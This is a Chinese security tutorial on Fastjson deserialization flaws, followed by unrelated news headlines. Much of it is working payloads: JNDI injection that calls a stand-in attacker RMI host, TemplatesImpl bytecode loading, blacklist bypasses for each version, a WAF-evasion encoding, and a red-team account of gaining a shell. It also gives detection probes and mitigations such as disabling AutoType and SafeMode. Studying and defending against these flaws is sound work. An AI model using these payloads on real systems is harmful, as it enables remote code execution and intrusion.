发布时间:2026/7/21 9:40:07
Fastjson反序列化漏洞原理与防御实践 1. Fastjson基础与漏洞背景Fastjson是阿里巴巴开源的一款高性能Java JSON处理库广泛应用于Java对象与JSON字符串之间的转换。作为国内使用最广泛的JSON库之一其反序列化漏洞堪称Java安全领域的经典案例。我第一次接触Fastjson漏洞是在2019年的一次渗透测试中。当时客户系统使用的是Fastjson 1.2.24版本通过构造特殊的JSON字符串我们成功实现了远程代码执行。这个经历让我深刻认识到JSON处理库的安全问题可能带来的严重后果。Fastjson的核心功能非常简单JSON.toJSONString()将Java对象序列化为JSON字符串JSON.parseObject()将JSON字符串反序列化为Java对象但正是这个看似简单的反序列化功能在特定条件下会成为系统安全的致命弱点。下面是一个基础示例// 序列化示例 Person person new Person(张三, 25); String json JSON.toJSONString(person); // 输出: {age:25,name:张三} // 反序列化示例 String jsonStr {\age\:30,\name\:\李四\}; Person person2 JSON.parseObject(jsonStr, Person.class);2. Fastjson反序列化漏洞原理2.1 type特性与AutoType机制Fastjson的反序列化漏洞核心源于其type特性。当JSON字符串中包含type字段时Fastjson会根据该字段值实例化对应的Java类。例如{ type: com.example.EvilClass, property: value }在反序列化时Fastjson会通过反射创建com.example.EvilClass实例调用该类的setter方法设置属性值如果该类实现了特定接口还会调用相关方法这种机制本意是为了支持多态但却为攻击者提供了可乘之机。攻击者可以构造特殊的type值指向存在危险方法的Java类。2.2 典型攻击向量分析2.2.1 JdbcRowSetImpl JNDI注入com.sun.rowset.JdbcRowSetImpl是Java标准库中的一个类其setAutoCommit()方法会触发JNDI查询。构造如下JSON即可实现攻击{ type: com.sun.rowset.JdbcRowSetImpl, dataSourceName: rmi://attacker-ip/exploit, autoCommit: true }当这个JSON被反序列化时创建JdbcRowSetImpl实例调用setDataSourceName()设置恶意RMI地址调用setAutoCommit(true)触发connect()connect()中执行JNDI查询加载远程恶意类2.2.2 TemplatesImpl字节码加载另一个经典攻击方式是使用com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl类加载恶意字节码{ type: com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl, _bytecodes: [恶意类Base64编码], _outputProperties: {} }反序列化时会触发getOutputProperties()方法进而执行嵌入的恶意字节码。3. 各版本漏洞与绕过技术3.1 Fastjson ≤1.2.24这是漏洞最严重的版本AutoType默认开启且无任何防护。直接使用上述攻击向量即可利用。实战技巧使用JNDI注入时确保目标服务器能访问你的RMI/LDAP服务字节码攻击需要确保目标环境包含对应的依赖库3.2 1.2.25-1.2.41版本绕过这些版本引入了AutoType黑白名单机制但存在多种绕过方式3.2.1 L;格式绕过{ type: Lcom.sun.rowset.JdbcRowSetImpl;, dataSourceName: rmi://attacker-ip/exploit, autoCommit: true }原理Fastjson在1.2.25-1.2.41版本中对类名检查不严格Lcom.sun...;这种格式可以绕过黑名单检查。3.2.2 数组格式绕过{ type: [com.sun.rowset.JdbcRowSetImpl[{, dataSourceName: rmi://attacker-ip/exploit, autoCommit: true }3.3 1.2.42-1.2.43版本绕过这些版本修复了简单绕过但仍有方法3.3.1 双写L;绕过{ type: LLcom.sun.rowset.JdbcRowSetImpl;;, dataSourceName: rmi://attacker-ip/exploit, autoCommit: true }原理检查逻辑只去除一次L和;而类加载逻辑会递归去除。3.4 1.2.47版本缓存绕过这是最危险的绕过方式不需要开启AutoType{ a: { type: java.lang.Class, val: com.sun.rowset.JdbcRowSetImpl }, b: { type: com.sun.rowset.JdbcRowSetImpl, dataSourceName: rmi://attacker-ip/exploit, autoCommit: true } }原理第一部分将恶意类加入mapping缓存第二部分直接从缓存获取类绕过检查4. 漏洞检测与防御4.1 漏洞检测方法4.1.1 DNSLog检测{ type: java.net.Inet4Address, val: your-dnslog-url }如果收到DNS查询说明存在漏洞。4.1.2 延时检测{ type: java.lang.Thread, name: {type:java.lang.Stringaaa}, sleepTime: 5000 }如果响应延迟5秒可能存在漏洞。4.2 防御措施升级到最新版本Fastjson 1.2.68已修复已知漏洞关闭AutoTypeParserConfig.getGlobalInstance().setAutoTypeSupport(false);使用SafeMode1.2.68ParserConfig.getGlobalInstance().setSafeMode(true);自定义黑白名单ParserConfig.getGlobalInstance().addAccept(com.yourpackage.); ParserConfig.getGlobalInstance().addDeny(com.sun.);5. 实战案例与经验分享在一次红队评估中我们发现目标系统使用了Fastjson 1.2.47版本。通过以下步骤成功利用使用DNSLog确认漏洞存在搭建恶意RMI服务托管Exploit类发送精心构造的JSON请求{ a: {type:java.lang.Class,val:com.sun.rowset.JdbcRowSetImpl}, b: { type:com.sun.rowset.JdbcRowSetImpl, dataSourceName:rmi://our-server/Exploit, autoCommit:true } }成功获取系统shell关键经验内网环境中JNDI注入可能因网络隔离失效此时应优先考虑TemplatesImpl方式某些WAF会检测type字段可以尝试Unicode编码或注释绕过{\u0040type:com.sun.rowset.JdbcRowSetImpl}实际渗透中需要多次尝试不同payload因为环境配置可能影响利用成功率6. 学习资源与进阶方向对于想深入研究的同学建议搭建漏洞环境使用vulhub快速搭建测试环境不同Fastjson版本分别测试调试分析在IDEA中调试Fastjson源码重点关注ParserConfig.checkAutoType()方法扩展研究结合其他Java反序列化漏洞如Jackson、XStream研究JNDI注入的其他利用方式探索新型绕过WAF的技术Fastjson漏洞是理解Java反序列化安全的绝佳案例。通过这个漏洞的学习你不仅能掌握Fastjson本身的安全问题更能深入理解Java安全机制的薄弱环节。我在实际工作中发现很多开发人员至今仍在使用存在漏洞的Fastjson版本这为安全从业者提供了广阔的实践空间。

相关新闻

2026/7/21 9:35:07

凹函数与凸函数:机器学习优化收敛的几何本质

1. 项目概述:为什么凹函数和凸函数是机器学习的“隐形骨架” 你有没有遇到过训练模型时损失曲线反复震荡、优化器卡在某个平台期死活下不去,或者调参像开盲盒——换个学习率,模型要么飞速发散,要么纹丝不动?我带过十几…

2026/7/21 18:46:36

Ruby vs Python vs Julia vs R:数据科学语言终极对比指南

Ruby vs Python vs Julia vs R:数据科学语言终极对比指南 【免费下载链接】data-science-with-ruby Practical Data Science with Ruby based tools. 项目地址: https://gitcode.com/gh_mirrors/da/data-science-with-ruby 在当今数据驱动的时代,…

2026/7/21 18:46:36

运程测算-个人运势测算-流年运势查询-每日运程查询API接口介绍

前言 在中国传统文化中,黄历一直在人们的日常生活中扮演着重要角色。从婚嫁择日、开业选日、出行安排,到日常生活中的宜忌查询,很多人都会通过查看黄历来选择合适的时间安排重要事项。如今,传统黄历也逐渐从纸质版本走向数字化。…

2026/7/21 18:46:36

React-Blog:响应式设计与移动端适配的完整解决方案

React-Blog:响应式设计与移动端适配的完整解决方案 【免费下载链接】react-blog react hooks koa2 sequelize mysql 构建的个人博客。具备评论、通知、上传文章等等功能 项目地址: https://gitcode.com/gh_mirrors/rea/react-blog 在当今移动互联网时代&…

2026/7/21 18:46:36

4 个我常用的 Claude Code Skills 推荐给你

1. 引言 Claude Code 作为一款强大的 AI 编程助手,在日常开发中能极大提升效率。经过一段时间的使用,我沉淀了 4 个最常用、最实用的 Skill(技巧/技能),今天分享给你,希望能帮你更快上手、更高效地使用 Cla…

2026/7/21 18:41:36

Dex Retargeting错误排除指南:常见问题与解决方案汇总

Dex Retargeting错误排除指南:常见问题与解决方案汇总 【免费下载链接】dex-retargeting Various retargeting optimizers to translate human hand motion to robot hand motion. 项目地址: https://gitcode.com/gh_mirrors/de/dex-retargeting Dex Retarg…

2026/7/20 6:33:00

Unity与Python本地通信:基于Flask的跨语言数据交换实战

1. 项目概述:为什么我们需要一个本地通信服务器?在游戏开发、数字孪生、仿真训练等众多领域,Unity作为强大的实时3D内容创作平台,其核心逻辑通常由C#驱动。然而,当我们需要进行复杂的数据分析、机器学习推理、科学计算…

2026/7/21 0:08:52

华为OD机试 新系统真题 【酒店服务记录分析】

酒店服务记录分析(C++/Go/C/Js/Java/Py)题解 华为OD机试 新系统真题 华为OD上机考试 新系统真题 7月19号 100分题型 华为OD机试新系统真题目录点击查看: 华为OD机试新系统真题题库目录|机考题库 + 算法考点详解 题目内容 你是某连锁酒店的数据分析师,酒店每天都会用一串编…

2026/7/21 0:08:52

华为OD机试 新系统真题 【小明的顺风车】

小明的顺风车(C++/Go/C/Js/JAVA/Py)题解 华为OD机试新系统真题 华为OD上机考试新系统真题 7月19号 200分题型 华为OD机试新系统真题目录点击查看: 华为OD机试新系统真题题库目录|机考题库 + 算法考点详解 题目内容 小明自驾回家,为节省旅途成本,决定在网上挂出顺风车服务…

2026/7/20 19:08:28

3个高效策略:快速掌握Axure中文界面配置

3个高效策略:快速掌握Axure中文界面配置 【免费下载链接】axure-cn Chinese language file for Axure RP. Axure RP 简体中文语言包。支持 Axure 11、10、9。不定期更新。 项目地址: https://gitcode.com/gh_mirrors/ax/axure-cn 还在为Axure RP的英文界面感…